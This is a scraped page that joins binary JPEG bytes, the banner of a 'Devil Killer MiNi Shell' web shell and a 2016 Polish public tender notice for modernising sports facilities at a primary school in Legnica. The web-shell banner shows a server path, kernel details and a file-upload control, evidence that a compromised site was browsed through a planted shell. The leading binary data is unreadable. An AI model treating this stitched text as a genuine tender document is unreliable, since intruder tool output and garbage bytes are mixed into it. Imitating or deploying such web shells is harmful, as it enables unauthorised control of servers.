JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160524/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160524/131606-N-2016.html

<p class="kh_header"><b>Legnica: Wybór Wykonawcy zadania Szkoła Podstawowa nr 2 w Legnicy ul. Głogowska 50 -  Modernizacja  bazy sportowej dla potrzeb prowadzenia pozalekcyjnych zajęć sportowych dla dzieci i młodzieży jako elementu programów profilaktycznych</b><br>
<b>Numer ogłoszenia: 131606 - 2016; data zamieszczenia: 24.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Legnicy , pl. Słowiański 8, 59-220 Legnica, woj. dolnośląskie, tel. 076 7212100, faks 076 7212115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bip.legnica.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór Wykonawcy zadania Szkoła Podstawowa nr 2 w Legnicy ul. Głogowska 50 -  Modernizacja  bazy sportowej dla potrzeb prowadzenia pozalekcyjnych zajęć sportowych dla dzieci i młodzieży jako elementu programów profilaktycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Roboty budowlane polegające na realizacji zadania inwestycyjnego p.n. Szkoła Podstawowa nr 2 
w Legnicy ul. Głogowska 50 - Modernizacja bazy sportowej dla potrzeb prowadzenia pozalekcyjnych zajęć sportowych dla dzieci i młodzieży jako elementu programów profilaktycznych.
2. Zakres robót obejmuje wykonanie między innymi:
1)  Budowę boiska wielofunkcyjnego o nawierzchni syntetycznej z bieżnią okólną- 1936m2.
2)  Budowę boiska do piłki siatkowej o nawierzchni syntetycznej - 162m2
3)  Wykonanie toru do skoku w dal.
4)  Wykonanie nawierzchni syntetycznej z grami podwórkowymi.
5)  Wykonanie instalacji drenażowej.
6) Wykonanie nawierzchni syntetycznej w obrębie istniejącej siłowni plenerowej i terenu przyległego  do sali gimnastycznej - 110m2.
7)   Montaż piłkochwytów i elementów wyposażenia boisk.
8)   Wykonanie ciągów pieszych z kostki betonowej- 779m2.
9)   Przebudowę skarpy w pobliżu sali gimnastycznej na trybunę plenerową dwupoziomową  wraz z wykonaniem nowych schodów.
10)  Montaż elementów małej architektury - ławki, kosze na śmieci, stojaki na rowery.
11)  Wykonanie ogrodzenia od strony północnej działki.
12) Zagospodarowanie terenu zielonego - działka nr 764/13.
13) Wzmocnienie muru granicznego w pobliżu bramy wjazdowej na boisko szkolne.
14) Remont muru oporowego przy południowej elewacji budynku głównego.
15) Remont sali gimnastycznej wraz z wyposażeniem, w tym:
a) wykonanie wykładziny sportowej PCV - 165m2,
b) malowanie farbami emulsyjnymi sufitów i ścian - 414,50 m2;
c) drzwi dwuskrzydłowe zewnętrzne ocieplane stalowe, przeszklone - 3,52m2
d) wyposażenie sali gimnastycznej
- wysuwany słupek do boiska piłki siatkowej w gnieździe podłogowym  - 1 szt.
- elektroniczna tablica wyników-dostawa i montaż wraz z podłączeniem - 1 kpl.
- mata ochronna na podłogę sali gimnastycznej - 165 m2
- montaż drabinek w sali gimnastycznej 90x250 - 11 szt.
16)  Montaż kamer i opraw oświetleniowych zewnętrznych
17) Tablica z regulaminem korzystania z terenu boisk szkolnych - 2 szt..

3. Wymagane minimalne parametry nawierzchni poliuretanowej (można oferować produkt o parametrach równoważnych bądź lepszych):
Wytrzymałość  na rozciąganie 	równe lub większe niż 0,56Mpa
Wydłużenie w chwili zerwania	większe niż 40 %
Współczynnik tarcia mierzony odczytem TRRL 	większy niż 0,54
Odkształcenie pionowe w temp. 23oC	mniejsze niż 3,2 mm
Amortyzacja - redukcja siły w temp. 23oC	38 - 42  %
Grubość całkowita nawierzchni	13 mm

Wymagane dokumenty dotyczące nawierzchni poliuretanowej:
1)	Certyfikat First Class IAAF lub Certyfikat Second Class IAAF
2)	Atest Higieniczny PZH
3)	Aktualne badania laboratorium posiadające akredytacje IAAF potwierdzające parametry oferowanej nawierzchni a wymaganej przez Zamawiającego
4)	Aktualne badania na zgodność z normą PN-EN 14877: 2013
5)	Autoryzacja producenta systemu
6)	Karta techniczna systemu
7)	Badania na bezpieczeństwo ekologicznie nawierzchni 

4. Wymagania techniczne, które musi spełniać podłoga sportowa z nawierzchnią z wykładziny PCV (można oferować produkt o parametrach równoważnych bądź lepszych):
1)Górna warstwa wykładziny wykonana z ziarnistego gładzonego czystego winylu
2)Grubość warstwy użytkowej PCV z wtopioną siatką z włókna szklanego - min. 2,1 mm /+- 5%/
3)Dolna warstwa wykonana z pianki PCV i wzmocniona siatką z włókna szklanego - grubość warstwy pianki PCV - min. 4,9 mm,
4)Grubość całkowita wykładziny - min. 7 mm, 
5)Gęstość nawierzchni - min. 4,6 kg/m2, 
6)Reakcja na ogień - min. Cfl s1 (wg. EN 13 501-1),
7)Absorbcja wstrząsów - min. P1 (wg. EN 14 808) 
8)Klasa formaldehydów - E1 
9)Odbicie piłki - min. 90% ( wg. EN 12 235) 
10)Zawartość pentachlorofenu (PCP) - brak zawartości 
11)	Wykładzina musi posiadać fabrycznie wykonane na całej grubości zabezpieczenie przeciwpleśniowe i bakteriostatyczne 
12)	Wykładzina musi posiadać fabrycznie wykonane zabezpieczenie przed działaniem środków chemicznych i zabrudzeniem 

Zastosowana podłoga sportowa powinna posiadać - wymagane dokumenty:
1)Atest Higieniczny -  świadectwo informujące, iż wyrób (podłoga sportowa) podczas stosowania zgodnego z zaleceniami producenta, nie wpływa negatywnie na zdrowie i środowisko,
2)Certyfikat Zgodności z obowiązującą normą PN-EN 14904:2009 /ze wszystkimi kryteriami normy/ wydany przez Instytut Techniki Budowlanej lub inny uprawniony organ dla całego systemu podłogi sportowej (konstrukcja podłogi wraz z wykładziną sportową).
3)Autoryzację producenta dla całej (systemowej) podłogi sportowej.
4)Klasyfikację w zakresie reakcji na ogień dla całego systemu podłogi sportowej (konstrukcja+ wykładzina) - Cfl-s1 
5)przynajmniej jeden z poniższych certyfikatów międzynarodowych związków sportowych: 
- Certyfikat EHF /Europejski Związek Piłki Ręcznej/ 
- Certyfikat FIVB /Międzynarodowy Związek Piłki Siatkowej/ 
- Certyfikat IHF /Międzynarodowy Związek Piłki Ręcznej/ 

Zgodnie z załączoną dokumentacją:  Rozdział nr 4 i Rozdział nr 5 specyfikacji istotnych warunków zamówienia. Parametry nawierzchni poliuretanowej i podłogi sportowej  oraz wymagane dokumenty należy przyjąć  z opisu i wykazu jak wyżej. 

Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie - należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o parametrach technicznych, eksploatacyjnych i użytkowych nie gorszych niż zaproponowane przez Zamawiającego. Obowiązek udowodnienia równoważności leży po stronie Wykonawcy zgodnie z art. 30  ust. 5 ww. ustawy Pzp.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.11.12.00-0, 45.11.27.20-8, 45.21.22.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.000,-  PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia tj. jako Wykonawca   wykonali roboty  zgodnie  z  zasadami sztuki budowlanej  i   prawidłowo  ukończyli w   okresie ostatnich 5 lat przed upływem  terminu  składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 2 zamówienia  polegające na budowie boiska o nawierzchni syntetycznej o powierzchni min.  1.000 m2 - każde
Ocena spełnienia warunku według :
a)  oświadczenia Wykonawcy- załącznik nr 1 do Instrukcji dla Wykonawców - Rozdział 2 siwz oraz
b)  wykazu, wg wzoru załącznik nr 3 do Instrukcji dla Wykonawców - Rozdział 2 siwz,  robót budowlanych wykonanych w okresie ostatnich  5 lat przed upływem terminu  składania ofert, a jeżeli  okres  prowadzenia działalności jest krótszy -  w tym  okresie,  z  podaniem  ich  rodzaju  i wartości, daty i miejsca wykonania wraz z załączonymi:
- dowodami tj. poświadczeniami podmiotów, na rzecz których wykazane w załączniku roboty budowlane  zostały wykonane,  dotyczącymi najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone  lub innymi dokumentami, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie  uzyskać ww. poświadczeń podmiotów na rzecz których wykazane w załączniku roboty budowlane  zostały wykonane  np. poświadczenia, referencje, protokół zdawczo-odbiorczy, zawarta umowa z potwierdzeniem jej realizacji itp.  
     
Ocena spełnienia w/w warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia tj. mają do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia podanych niżej  stanowisk:
1) Kierownik budowy:
osoba z uprawnieniami budowlanymi w specjalności konstrukcyjno- budowlanej lub drogowej bez ograniczeń ,  w rozumieniu ustawy Prawo Budowlane z 07.07.1994 (Dz. U. z 2016r. poz. 290 - tekst jednolity) wpisana na listę członków izby samorządu zawodowego  zgodnie  z zapisami  Rozdziału 2  ww.  ustawy Prawo budowlane i   ubezpieczona  od odpowiedzialności cywilnej   za   szkody,   które mogą  wyniknąć  w  związku  z   wykonywaniem  ww.  funkcji, która posiada kwalifikacje i doświadczenie, polegające na tym, że była kierownikiem budowy  lub inspektorem nadzoru na  1 zadaniu  polegającym  na budowie boiska o nawierzchni syntetycznej  o powierzchni min.  1.000 m2,  wraz z informacjami na temat jej  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez nią  czynności.

2) Kierownik robót instalacyjnych :
osoba z uprawnieniami budowlanymi w specjalności  inżynieryjno -instalacyjnej,  w rozumieniu ustawy Prawo Budowlane z 07.07.1994r. (Dz. U. z 2016r. poz. 290 - tekst jednolity) wpisana na listę członków izby samorządu zawodowego  zgodnie  z zapisami  Rozdziału 2  ww.  ustawy Prawo budowlane i   ubezpieczona  od odpowiedzialności cywilnej   za   szkody,   które mogą  wyniknąć  w  związku  z   wykonywaniem  ww.  funkcji, wraz z informacjami na temat jej  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez nią  czynności.

3) Kierownik robót elektrycznych:
osoba z uprawnieniami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy Prawo Budowlane z 07.07.1994r. (Dz. U. z 2016r. poz. 290 - tekst jednolity) wpisana na listę członków izby samorządu zawodowego zgodnie z zapisami Rozdziału 2 ww. ustawy Prawo budowlane  i ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem ww.  funkcji, wraz z informacjami na temat jej  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez nią  czynności.

Ocena spełnienia warunku według :
 a)  oświadczenia Wykonawcy- załącznika nr 1 do Instrukcji dla Wykonawców - Rozdział 2 siwz oraz
b)  wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji  zawodowych, doświadczenia  i wykształcenia  niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania  tymi osobami - załącznik nr 4 do Instrukcji dla Wykonawców - Rozdział 2 siwz, i 
c) dla kierownika budowy informacji potwierdzających, że osoba ta była kierownikiem budowy  lub inspektorem nadzoru na  1 zadaniu  polegającym  na budowie boiska o nawierzchni syntetycznej o powierzchni min.  1.000 m2 -  wraz z informacjami na temat jej  kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez nią  czynności.
 d) oświadczenia, że wskazane w załączniku nr 4 osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają ww. wymagane uprawnienia w rozumieniu ustawy Prawo Budowlane z 07.07.1994r. (Dz. U. z 2016r. poz. 290 - tekst jednolity)  wpisana na listę członków izby samorządu zawodowego  zgodnie  z  zapisami  Rozdziału 2  ww.  ustawy Prawo budowlane 
i   ubezpieczona  od odpowiedzialności cywilnej   za   szkody,   które   mogą  wyniknąć  w  związku  z   wykonywaniem  ww.  funkcji

Ocena spełnienia w/w warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.   Formularz oferty wg załączonego druku  Rozdziału  Nr 1.
2.  Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a  w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust 1 pkt 2) ustawy Pzp. Aktualny odpis winien określać miejsce rejestracji, formę prawną, pełny adres siedziby Wykonawcy, nazwę organu uprawnionego do reprezentowania Wykonawcy, sposób reprezentacji Wykonawcy oraz dane osób upoważnionych do składania oświadczeń w imieniu Wykonawcy. W przypadku reprezentowania Wykonawcy przez pełnomocników załącza on dokument pełnomocnictwa podpisany przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawcy zgodnie z dokumentem rejestracyjnym. W przypadku niezgodności wpisu ze stanem faktycznym Wykonawca musi złożyć dokument sporządzony przez jego właściwy organ, a uprawniający daną osobę lub osoby do reprezentowania Wykonawcy na zewnątrz.  
3. Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu z art. 22 ust.1 ustawy Pzp wg załącznika nr 1 do Instrukcji dla Wykonawców - Rozdział nr 2 siwz.
4.   Oświadczenie Wykonawcy na przyjęcie warunków zmian w umowie - wg załącznika nr 5 do Instrukcji dla Wykonawców - Rozdział nr 2 siwz. 
5.  Oświadczenie Wykonawcy - wskazanie części zamówienia, której wykonanie powierzy podwykonawcom - wg załącznika nr 6 do Instrukcji dla Wykonawców - Rozdział nr 2 siwz.
6.  Gwarancja jakości Wykonawcy - wg załącznika nr  7  do Instrukcji dla Wykonawców- Rozdział nr 2 siwz. 
7.  Formularz cenowy sporządzony wg załączonego wzoru Rozdziału 5, do którego należy dołączyć    wyceniony przedmiar robót wg pkt. 12 Instrukcji dla Wykonawców- Rozdział nr 2 siwz sporządzony wg wzoru kosztorysu ofertowego -  załącznik nr 8 do Instrukcji dla Wykonawców- Rozdział nr 2 siwz.
8.  Wypełnioną umowę  wg Rozdziału Nr  3 -  wypełnienie  i  akceptacja   umowy  nie  stanowi zobowiązań   prawnych ze strony Zamawiającego.
9. W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia pełnomocnictwo, w którym Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanowią i wskażą Zamawiającemu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowanie w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego. Pełnomocnictwo będzie podpisane przez osoby upoważnione do reprezentowania i podpisywania oświadczeń w imieniu Wykonawców zgodnie z dokumentami rejestracyjnymi. W przypadku niezgodności wpisu ze stanem faktycznym Wykonawcy każdy Wykonawca musi złożyć dokumenty sporządzone przez jego właściwy organ, a uprawniający daną osobę lub osoby do reprezentowania Wykonawcy i podpisywania oświadczeń w imieniu Wykonawców.
10. W sytuacji gdy Wykonawca, zgodnie z art. 26  ust 2b w zakresie warunków określonych w pkt. 13 Instrukcji dla Wykonawców-Rozdział 2 siwz polegał będzie na wiedzy i doświadczeniu lub  osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru  prawnego łączących go z nim stosunków, pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy wykonaniu zamówienia.
11.  Dowód wpłacenia/ wniesienia wadium.
12. Oświadczenie Wykonawcy dotyczące oferowanej nawierzchni poliuretanowej - wg załącznika nr 10 do Instrukcji dla Wykonawców- Rozdział nr 2 siwz  wraz  z  poniższymi załącznikami :
1)	Certyfikat First Class IAAF lub Certyfikat Second Class IAAF
2)	Atest Higieniczny PZH
3)	Aktualne badania laboratorium posiadające akredytacje IAAF potwierdzające parametry oferowanej nawierzchni a wymaganej przez Zamawiającego
4)	Aktualne badania na zgodność z normą PN-EN 14877: 2013
5)	Autoryzacja producenta systemu
6)	Karta techniczna systemu
7)	Badania na bezpieczeństwo ekologicznie nawierzchni 
